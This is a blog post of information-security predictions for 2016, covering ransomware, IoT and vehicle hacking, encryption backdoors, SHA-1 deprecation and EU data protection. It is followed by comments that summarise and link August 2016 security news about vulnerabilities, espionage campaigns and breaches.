Here are my predictions for trends in information security and cyber security for year 2016.
Year 2015 was bad for information security was pretty, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there was Airplanes hacked, cars hacked, vulnerabilities in a breathtaking range of sensitive equipment from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and in the identification of target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have impact on what comes in 2016: New EU data protection legislation package approved and EU Court of Justice decision in which it noted the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under the Safe Harbor violation of law – you need some other agreement for this. The situation for this will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After huge amount of user information leaks in 2015 from all kinds of Internet services, there will the challenges for cloud companies to gain trust in their security. You might have just dared to trust “the right cloud services,” since in principle the traditional information security point of view, they seem to be the main things okay, rising this privacy issues raised.
New environments will bring new threats. New operating systems versions means that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important important in 2016 as 5G networks will be critical infrastructure, on top of which for example. transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem in revelations as all other news coverage is the exponential growth of knowledge. There are variety of news summaries produced a daily basis, but they are not enough to get good picture of what is happening. There are bigger and smaller news, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
Old way network security focused on perimeter defense is not enough in 2016. Old mantras “encrypt everything” and “secure the perimeter,” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: If you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to public key infrastructure lock-and-key system you will need also an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans to various kinds of breaches – with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout year 2016. In 2015 Law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes.Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials to demand such thing with varying success on different countries. Another fact is that The existence of coded communications is a reality and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: Encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access to government – ie, a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals - Juniper’s VPN security hole is proof that govt backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. The poorly thought-out and crude surveillance technique could have a devastating effect on the country’s internet security- as for example Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users install state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for early SHA-1 crypto cutoff that can happen in 2016 instead of earlier planned Jan 1st, 2017. Due to recent research showing that SHA-1 is weaker than previously believed, because it’s been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start display errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates in the end of 2016.
The use of Blockchain technology, permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than for just Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with Linux Foundation.
The use of disk encryption will increase and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or loose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security neeeds. The disadvantage of this approach is that Your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak leaking passwords are still huge security problem still in 2016. Passwords are often the weakest parts when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering in a code sent via text method to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.
Google begins testing login system that uses phone notifications for authentication instead of passwords: authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.
Smart phone will become more and more security critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP as “There are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example US Navy is using obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.
Cars were hacked at record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars are featuring more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five star Cyber Safety Framework to mitigate this threat in cars, hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms – not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe, either, as they are built using largerly same too often vulnerable technologies as other IoT system. IoT security is still in in infancy in 2016.
Cyber criminals have become more active in 2015 particularly in the malicious the ransom fabrications. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily and Exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware I recommend to ensure IT Support or your service provider the data back-up and restoring procedure operational, practiced and tested. You can need it in 2016 to get your data back without considering paying to criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016 and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held ransom to DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. Ransomware Is Coming to Medical Devices article tells that according to a report released recently week by Forrester Research the number one cybersecurity prediction for 2016: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint”. Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will be hacked. In 2016 If You’re Not Paranoid, You’re Crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have solution for that.
2,232 Comments
Tomi Engdahl says:
Linux bug leaves 1.4 billion Android users vulnerable to hijacking attacks
Off-path attack means malicious hackers can be located anywhere on the Internet.
http://arstechnica.com/security/2016/08/linux-bug-leaves-1-4-billion-android-users-vulnerable-to-hijacking-attacks/
An estimated 80 percent of Android phones contain a recently discovered vulnerability that allows attackers to terminate connections and, if the connections aren’t encrypted, inject malicious code or content into the parties’ communications, researchers from mobile security firm Lookout said Monday.
As Ars reported last Wednesday, the flaw first appeared in version 3.6 of the Linux operating system kernel, which was introduced in 2012. In a blog post published Monday, Lookout researchers said that the Linux flaw appears to have been introduced into Android version 4.4 (aka KitKat) and remains present in all future versions, including the latest developer preview of Android Nougat. That tally is based on the Android install base as reported by statistics provider Statista, and it would mean that about 1.4 billion Android devices, or about 80 percent of users, are vulnerable.
“The tl;dr is for Android users to ensure they are encrypting their communications by using VPNs, [or] ensuring the sites they go to are encrypted,” Lookout researcher Andrew Blaich told Ars. “If there’s somewhere they’re going to that they don’t want tracked, always ensure they’re encrypted.”
The vulnerability makes it possible for anyone with an Internet connection to determine whether any two parties are communicating over a long-lived transport control protocol connection, such as those that serve Web mail, news feeds, or direct messages. In the event the connections aren’t encrypted, attackers can then inject malicious code or content into the traffic. Even when the connection is encrypted, the attacker may still be able to determine a channel exists and terminate it. The vulnerability is classified as CVE-2016-5696.
A Google representative said company engineers are are already aware of the vulnerability and are “taking the appropriate actions. As noted in this post, the representative pointed out the flaw resides within vulnerable versions of the Linux kernel and it’s not Android specific. The representative went on to say that the Android security team rates the risk “moderate,” as opposed to “high” or “critical” for many of the vulnerabilities it patches. Maintainers of the Linux kernel have already patched CVE-2016-5696. It wouldn’t be surprising if that fix is incorporated into a new Android release in the next month or so.
Tomi Engdahl says:
Joseph Cox / Motherboard:
US court documents show Australian authorities hacked Tor users in US as part of a child pornography investigation and shared the findings with the FBI — Australian authorities hacked Tor users in the US as part of a child pornography investigation, Motherboard has learned.
Australian Authorities Hacked Computers in the US
http://motherboard.vice.com/read/australian-authorities-hacked-computers-in-the-us
Tomi Engdahl says:
Ask HN: Is the Delta outage a ‘bug’ or a malicious hack? | Hacker News
https://news.ycombinator.com/item?id=12251690
According to the Ars Technica article http://arstechnica.com/business/2016/08/data-center-disaster… a fire broke out in their main datacenter. Assuming that was true, employees were most likely evacuated and at the very least would have been distracted. Their disaster recovery plan may have assumed that there would be admins onsite to run a manual switch, may have assumed a complete failure instead of a partial failure or may have had per application disaster recovery plans. Disaster recovery is a difficult and stressful process in normal times, much more so when your regular workstation(s) are unavailable and you’re faced with a disaster-level distraction like a fire.
I am really surprised they don’t have a high availability setup for their database, etc being a fortune 500 company. Hours of downtime is serious money for them it would seem. Well if they did have such setup, it failed.
Even a bootstrapped startup could get a MongoDB Cluster or something similar going in multiple datacenters.
The power company Tweeted about it also. https://twitter.com/GeorgiaPower/status/762662968572215296
So I guess it was a power outage only at their place…
But the whole idea of not having working redundancy in a multibillion dollar business really makes me question their story.
So not to sound like a conspiracy theorist, but I do think there is a possibility they got hacked. And if that hunch is true then calling it a power outage instead of admitting it is a insult to our intelligence.
Delta Air Lines Computer Hack? Flight Delays, 300 Cancellations, People Screaming At Gate Agents, Conspiracy Theories
http://www.inquisitr.com/3396506/delta-air-lines-computer-hack-flight-delays-300-cancellations-people-screaming-at-gate-agents-conspiracy-theories/#yMJXLhLC180WDieY.99
Was Delta hacked? The worldwide Delta Air Lines outage is causing quite a fuss for airline passengers around the world on Monday, August 8. The trending #Delta hashtag on Twitter reveals all sorts of theories about why Delta Air Lines planes have been grounded across the globe.
According to the official Twitter account named @Deltanewshub, there was a power outage that had an effect on Delta Airlines flights around the world.
Tomi Engdahl says:
Forensics tool nabs data from Signal, Telegram, WhatsApp
‘Retroscope’ smartphone app can retrieve your last five screens
http://www.theregister.co.uk/2016/08/15/retroscope/
USENIX VID University researchers have developed a new method to help forensic investigators extract data information from memory.
The tool, dubbed Retroscope, recovered data from up to the previous 11 screens displayed from up to 15 apps, with an average of five screens pulled from each.
Apps included Signal, Skype, WeChat, Gmail, Facebook, WhatsApp, and Telegram running on a Samsung S4, LG G3, and HTC One.
It is a “new paradigm in smartphone forensics”, according to the team of Brendan Saltaformaggio, Rohit Bhatia, Xiangyu Zhang, and Dongyan Xu of Purdue University, and Golden G. Richard III of the University of New Orleans.
“We feel without exaggeration that this technology really represents a new paradigm in smartphone forensics,” Saltaformaggio says.
Public release of the RetroScope Android memory forensics framework
https://github.com/ProjectRetroScope/RetroScope
Tomi Engdahl says:
WikiLeaks released a cache of malware in its latest email dump
Critics say the materials could endanger the free speech advocates it is meant to help.
https://www.engadget.com/2016/08/15/wikileaks-released-a-cache-of-malware-in-its-latest-email-dump/
In its rush to let information be free, WikiLeaks has released over 80 different malware variants while publishing its latest collection of emails from Turkey’s ruling AKP political party. In a Github post, security expert Vesselin Bontchev has laid out many of the instances of malicious links, most of which came from “run-of-the-mill” spam and phishing emails found in the dump. While WikiLeaks has claimed the emails shed light on corruption within the Turkish government, New York Times reporter Zeynep Tufekci has pointed out that the materials have little to do with Turkish politics and mostly appear to be mailing lists and spam.
Malware hosted by Wikileaks
https://github.com/bontchev/wlscrape/blob/master/malware.md
Tomi Engdahl says:
China Launches World’s First Quantum Communications Satellite
https://news.slashdot.org/story/16/08/16/0335214/china-launches-worlds-first-quantum-communications-satellite
China’s quantum network could soon span two continents, thanks to a satellite launched earlier today. Launched at 1:40pm ET, the Quantum Science Satellite is designed to distribute quantum-encrypted keys between relay stations in China and Europe. When working as planned, the result could enable unprecedented levels of security between parties on different continents. China’s new satellite would put that same fiber-based quantum communication system to work over the air, utilizing high-speed coherent lasers to connect with base stations on two different continents.
The satellite will be the first device of its kind if the quantum equipment works as planned. According to the Wall Street Journal, the project was first proposed to the European Space Agency in 2001 but was unable to gain funding.
China’s new satellite would create the world’s largest quantum network
http://www.theverge.com/2016/8/15/12489914/china-satellite-quantum-encryption-network-launch
China’s quantum network could soon span two continents, thanks to a satellite launched earlier today. Launched at 1:40PM ET, the Quantum Science Satellite is designed to distribute quantum-encrypted keys between relay stations in China and Europe. When working as planned, the result could enable unprecedented levels of security between parties on different continents.
The satellite works by the principles of quantum cryptography, similar to existing fiber-based quantum key distribution networks in Europe, China, and the US. By monitoring noise on the network, the system allows distant parties to obtain identical random strings of data without being intercepted by outside parties, providing the raw material for future encrypted communications. Properly applied, the systems resist nearly all conventional forms of decryption, and can be installed by adding specialized routing equipment to existing fiber optic cable.
China’s new satellite would put that same system to work over the air, utilizing high-speed coherent lasers to connect with base stations on two different continents. The experimental satellite’s payload also includes controllers and emitters related to quantum entanglement. Still, deploying such a system from space remains experimental
If successful, the satellite will be the first device of its kind, enabling the world’s first trans-continental quantum key distribution network.
Tomi Engdahl says:
One In Five Vehicle Software Vulnerabilities Are ‘Hair On Fire’ Critical
https://tech.slashdot.org/story/16/08/13/2157220/one-in-five-vehicle-software-vulnerabilities-are-hair-on-fire-critical
One of every five software vulnerabilities discovered in vehicles in the last three years are rated “critical” and are unlikely to be resolved through after the fact security fixes, according to an analysis by the firm IOActive. “These are the high priority ‘hair on fire’ vulnerabilities that are easily discovered and exploited and can cause major impacts to the system or component,” the firm said in its report…
The bulk of vulnerabilities that were identified stemmed from a failure by automakers and suppliers to follow security best practices including designing in security or applying secure development lifecycle (SDL) practices to software creation… The result is that vehicle cybersecurity vulnerabilities are not solvable using “bolt-on” solutions, IOActive concluded…
One in Five Vehicle Vulnerabilities are ‘Hair on Fire’ Critical
https://securityledger.com/2016/08/one-in-five-vehicle-vulnerabilities-are-hair-on-fire-critical/
In-brief: One of every five software vulnerabilities discovered in vehicles in the last three years are rated “critical” and are unlikely to be resolved through after the fact security fixes, according to an analysis by the firm IOActive.
One of every five software vulnerabilities discovered in vehicles in the last three years are rated “critical” and are unlikely to be resolved through after the fact security fixes, according to an analysis by the firm IOActive.
“These are the high priority ‘hair on fire’ vulnerabilities that are easily discovered and exploited and can cause major impacts to the system or component,” the firm said in its report, which it released last week. The report was based on an analysis of more than 150 vehicle security flaws identified over three years by IOActive or publicly disclosed by way of third-party firms.
The results, while not dire, are not encouraging. The bulk of vulnerabilities that were identified stemmed from a failure by automakers and suppliers to follow security best practices including designing in security or applying secure development lifecycle (SDL) practices to software creation. “These are all great things that the software industry learned as it has progressed in the last 20 years. But (automakers) are not doing them.”
The result is that vehicle cybersecurity vulnerabilities are not solvable using “bolt-on” solutions, IOActive concluded. That is because they are caused by flawed engineering assumptions or insecure development best practices. “The most effective cybersecurity work occurs during the planning, design and early implementation phases of products, with the difficulty and cost of remediation increasing in correlation with product age and complexity,” IOActive’s report notes.
Commonalities in Vehicle Vulnerabilities
http://www.infosecurity-magazine.com/download/227664/
Tomi Engdahl says:
‘You’re welcome’: Snowden casts light on NSA hack
https://www.rt.com/usa/356170-snowden-analysis-nsa-hack/
The files released by a hacker group that claims to have breached the NSA are authentic, whistleblower Edward Snowden has said, explaining the documents’ importance and potential impact on the US elections and relations with allies around the world.
Snowden, who blew the whistle on NSA surveillance operations in 2013, posted a series of tweets on Tuesday with his take on the hack.
Tomi Engdahl says:
How IoT companies can beef up their data security
http://thenextweb.com/entrepreneur/2016/08/15/how-iot-companies-can-beef-up-their-data-security/
With high-profile data breaches all over the news, cybersecurity is on everyone’s mind. But beyond educating staff and users alike on best practices, what can Internet of Things companies do to improve their data security practices as they rush to ship products out the door?
To find out, I asked 10 entrepreneurs from YEC
Tomi Engdahl says:
Paul Thurrott / Thurrott.com:
Microsoft consolidates its separate two-factor authentication apps into one new app, Microsoft Authenticator, for Android and iOS
Microsoft Authenticator Now Available on Android and iOS
https://www.thurrott.com/mobile/76205/microsoft-authenticator-now-available-android-ios
As promised, Microsoft has updated and renamed its previous account verification app for Android and iOS, Azure Authenticator, to Microsoft Authenticator. This app lets you use multi-factor authentication (MFA) with your online accounts. And do so more easily than before.
The newly updated Microsoft Authenticator apps for Android and iOS replace the previous Azure Authenticator apps, and will replace a weird smattering of other apps (like Microsoft Account on Android) as well.
Tomi Engdahl says:
For companies new security requirements: economic sanctions “unprecedented”
Does your company have cyber security strategy will lead to one of the security and whether the responsibility of applicants named?
Carelessness can become extremely expensive. The EU’s new Data Protection Regulation shall enter into force in Finland in 2018, as long as the Ministry of Justice has the details ready. In the future, the company management must be actively and demonstrably ensure the adequacy of their security.
Registers that have personal information get the special protection in the Regulation.
If sensitive information leakage and non-compliance is found, the economic sanctions are unprecedented extent in Finland. The fine may, at worst, to rise to EUR 20 million or four per cent of the company’s worldwide turnover – whichever is greater. These come on top of any damages.
Opening place has just completed an international IT giant CGI’s statement made in Finland in Finnish cyber security space organizations 2016, asking 200 the organization of their perception of their own data security.
Based on the survey companies cyber security attitude is partly contradictory. Digitalization has brought with it the risk awareness, but surprisingly few businesses have started to lead to a security or made cyber security strategy. Only half of the organizations says that their cyber security to be in the hands of expert. Only 29 per cent have made cyber security strategy.
Two-thirds of respondents considered it likely that their organization has been the subject of launch cyber-attacks anyone knowing about it. An even greater proportion expect within a year of the invasion. Inconsistently even 69 percent believe their organization’s ability to identify and launch cyber-attacks of 60 per cent also says they have discovered.
Today, insurance is available to protect the economic risks of a data breach. Only a few companies had purchased the insurance, but one in five considered it.
The worst scenario is the energy and water as well as health and wellness business areas. Public administration, defense, IT and financial sector and the industry are more awake.
Source: http://www.tivi.fi/Kaikki_uutiset/yrityksille-uusia-tietoturvavaatimuksia-taloudelliset-sanktiot-ennennakemattomat-6573900
Tomi Engdahl says:
“HOMEKit” Exploit Generator Used to Deliver Espionage Malware
http://www.securityweek.com/homekit-exploit-generator-used-deliver-espionage-malware
Researchers have come across a document exploit generator that has been used over the past few years by several threat actors to deliver malware in cyber espionage campaigns.
The toolkit, dubbed “HOMEKit” by Palo Alto Networks, is believed to have been used to generate malicious Microsoft Word documents for various campaigns since 2013. Similar to the MNKit exploit generator, HOMEKit relies on the CVE-2012-0158 vulnerability in Office to deliver malware.
HOMEKit is designed to exploit a vulnerability in the TreeView ActiveX control. If the flaw is exploited successfully, a shellcode is executed and a decoy document is opened. In the meantime, a payload (.dat file) is executed on the system.
“The difference between the functional shellcode that installs Cookle and DarkHotel lies in the way a process is created to execute the payload and to open the decoy document,”
Tomi Engdahl says:
MONSOON Cyber-Espionage Campaign Linked to Patchwork APT
http://www.securityweek.com/monsoon-cyber-espionage-campaign-linked-patchwork-apt
A cyber-espionage campaign operating for more than eight months has been linked to an Indian Advanced Persistent Threat (APT) group known as Patchwork, which might be the same attackers behind Operation Hangover, Forcepoint researchers warn.
Dubbed MONSOON, the campaign was observed starting in May this year, but started in December 2015 and is still ongoing, researchers say. Characteristic to this campaign is the use of weaponized documents with political themes, distributed through emails specifically tailored for the targets, which are both Chinese nationals within different industries and government agencies in Southern Asia.
One adversary, multiple names
Tomi Engdahl says:
MICROS Hackers Targeted Five Other PoS Vendors
http://www.securityweek.com/micros-hackers-targeted-five-other-pos-vendors
The cybercrime gang that breached the systems of Oracle-owned point-of-sale vendor MICROS has reportedly also targeted several other similar companies.
Oracle admitted last week that it had detected malicious code on certain legacy MICROS systems and advised customers to change their passwords for support accounts and accounts used by MICROS representatives to remotely access their on-premise systems.
Oracle has assured customers that other services are not impacted and that payment card data is encrypted in customer environments hosted by MICROS.
Experts involved in the investigation told security blogger Brian Krebs that the breached support portal communicated with a server associated with Carbanak, the threat actor believed to have stolen as much as one billion dollars between 2013 and 2015 from more than 100 banks worldwide. A security alert issued by Visa following the MICROS breach includes indicators of compromise (IoC), which also show a link to Carbanak.
It appears that Oracle’s MICROS was not the only PoS vendor targeted by the group. Cybercrime monitoring company Hold Security told Forbes that the same hackers also claimed to have penetrated the systems of five other PoS system vendors, including ECRS, Cin7, PAR Technology, Navy Zebra and Uniwell.
Tomi Engdahl says:
Hard Drive Noise Allows Data Theft From Air-Gapped Computers
http://www.securityweek.com/hard-drive-noise-allows-data-theft-air-gapped-computers
Researchers have identified yet another attack method that can be used to silently exfiltrate data from air-gapped computers. The latest technique involves the noise emitted by hard disk drives and it’s relatively efficient over short distances.
A team of experts from the Cyber Security Research Center at Ben-Gurion University of the Negev in Israel have published a research paper that details a method they call “DiskFiltration.”
Air-gapping a computer (i.e. isolating it from the Internet) is considered by many organizations a highly efficient security measure since, in theory, it should be impossible to remotely steal information from the device. However, researchers demonstrated on several occasions over the past years that the air-gap can be jumped using optic, thermal, electromagnetic and acoustic channels.
The new method, DiskFiltration, leverages the noise emitted by hard disk drives (HDD) and solid state hard drives (SSHD). More precisely, the noise is generated by the mechanical movement of the actuator arm over the platter that stores the data.
A piece of malware planted by attackers on the targeted air-gapped computer can conduct seek operations, which causes the actuator arm to move between different tracks. Starting and stopping a sequence of seek operations can be translated into zeros and ones, which represent bits of data.
DiskFiltration: Data Exfiltration from Speakerless Air-Gapped
Computers via Covert Hard Drive Noise
https://arxiv.org/ftp/arxiv/papers/1608/1608.03431.pdf
Tomi Engdahl says:
Gmail Flags Unauthenticated Messages, Dangerous URLs
http://www.securityweek.com/gmail-flags-unauthenticated-messages-dangerous-urls
Google this week added new alerts to Gmail to improve the security of its users by informing them when messages can’t be authenticated and when they contain dangerous URLs.
Gmail is now alerting users whenever they receive a message that can’t be authenticated with either Sender Policy Framework (SPF) or DKIM, Google announced. The alert comes in the form of a question mark in place of the sender’s profile photo, corporate logo, or avatar.
Additionally, Google is alerting Web users when they click on a URL received via email, if the link directs the user to a dangerous site known for phishing, malware, and Unwanted Software.
Tomi Engdahl says:
Windows 10 needs proper privacy portal says EFF
Slams ‘questionable tactics to cause users to download software many didn’t want’
http://www.theregister.co.uk/2016/08/18/windows_10_needs_proper_privacy_portal_says_eff/
The Electronic Frontier Foundation (EFF) has called on Microsoft to offer a “single unified screen” on which Windows 10 users can control how Windows 10 deals with their personal information and monitors their use of the OS.
The organisation has listed the long list of nasty nagware tactics Microsoft used to get people running Windows 10, labelling some “questionable tactics to cause users to download a piece of software that many didn’t want.”
https://www.eff.org/deeplinks/2016/08/windows-10-microsoft-blatantly-disregards-user-choice-and-privacy-deep-dive
Tomi Engdahl says:
If this headline was a security warning 90% of you would ignore it
Boffins find interrupting users with pop-ups in the middle of things just doesn’t work
http://www.theregister.co.uk/2016/08/18/coding_pop_ups_hit_em_when_theyre_idling_university_boffins_say/
Developers, advertisers, and scammers be warned; boffins say your pop ups will be almost universally ignored if they interrupt users.
The work examined how users respond to web-based messages during times of varying concentration and found users who are engaged deeply in some task will ignore pop ups.
The university quintet finds messages, notably those flagging legitimate information such as security warnings, should be displayed as soon as users land on a site, have finished watching a video, or are switching domains. At any other times, they’ll be ignored.
The reason is that we’re collectively rubbish at multi-tasking, leading the team to say 90 percent of people clicking ignore, dismiss, or cancel when legitimate but distracting messages appear.
Users are notorious for dismissing security warnings and patch requests pushing the technology industry to make updates automatic and silent.
Tomi Engdahl says:
More airline outages seen as carriers grapple with aging technology
http://www.reuters.com/article/us-delta-air-outages-it-analysis-idUSKCN10N1A3
Airlines will likely suffer more disruptions like the one that grounded about 2,000 Delta (DAL.N) flights this week because major carriers have not invested enough to overhaul reservations systems based on technology dating to the 1960s, airline industry and technology experts told Reuters.
Airlines have spent heavily to introduce new features such as automated check-in kiosks, real-time luggage tracking and slick mobile apps. But they have avoided the steep cost of rebuilding their reservations systems from the ground up, former airline executives said.
Scott Nason, former chief information officer at American Airlines Group Inc (AAL.O), said long-term investments in computer technology were a tough sell when he worked there.
“Most airlines were on the verge of going out of business for many years, so investment of any kind had to have short pay-back periods,”
The reservations systems of the biggest carriers mostly run on a specialized IBM (IBM.N) operating system known as Transaction Processing Facility, or TPF. It was designed in the 1960s to process large numbers of transactions quickly and is still updated by IBM, which did a major rewrite of the operating system about a decade ago.
A host of special features, ranging from mobile check-ins to seat selection and cabin upgrades, are built on top of the TPF core, or connected to it.
U.S. and Canadian airlines are projected to spend an average of 3 percent of their revenue on information technology this year – compared to 8 percent by commercial banks and 4 percent by healthcare firms, according to Computer Economics, a firm that tracks IT spending.
Tomi Engdahl says:
FalseCONNECT Flaw Exposes Proxy Connections to Attacks
http://www.securityweek.com/falseconnect-flaw-exposes-proxy-connections-attacks
Products from Apple, Microsoft, Oracle and possibly other major companies are affected by a vulnerability that exposes connections made via a proxy server to man-in-the-middle (MitM) attacks.
The security hole, discovered by researcher Jerry Decime and dubbed “FalseCONNECT,” is caused by issues in the implementation of proxy authentication and it can result in a complete compromise of HTTPS trust.
When a client and a server communicate over an encrypted channel, they perform a handshake where they establish a shared encryption key. If the connection goes through a proxy server, the proxy must not know the encryption key in order to ensure end-to-end security. This is achieved by using an HTTP CONNECT request, which instructs the proxy to establish a connection to the server and ensures that the proxy only acts as a data relay.
Since these HTTP CONNECT requests are made before the HTTPS handshake, the data is sent in clear text over HTTP. This allows an MitM attacker to replace the “200 OK CONNECT” response from the proxy with a “407 Proxy Authentication Required” message and phish the victim’s credentials.
A malicious actor can leverage this method to steal a user’s authentication credentials and session cookies and the attack would likely not raise any suspicion as the browser’s address bar still displays the padlock icon and the “https://” string.
Anyone who relies on a proxy could be affected by the FalseCONNECT vulnerability and some users might not even know that they are vulnerable if a proxy auto-config (PAC) file is installed on their system. Decime has also pointed out that even proxies which don’t require authentication are affected.
Until the issue is addressed by all affected vendors, users have been advised to avoid the use of proxy-configured clients when connecting to untrusted networks, and disable PAC and web proxy auto-discovery (WPAD) if they are not needed.
http://falseconnect.com/
Tomi Engdahl says:
Address Bar Spoofing Vulnerability Found in Several Browsers
http://www.securityweek.com/address-bar-spoofing-vulnerability-found-several-browsers
Chrome, Firefox and other web browsers are plagued by vulnerabilities that can be exploited to spoof their address bar. Some of the affected vendors are still working on addressing the issues.
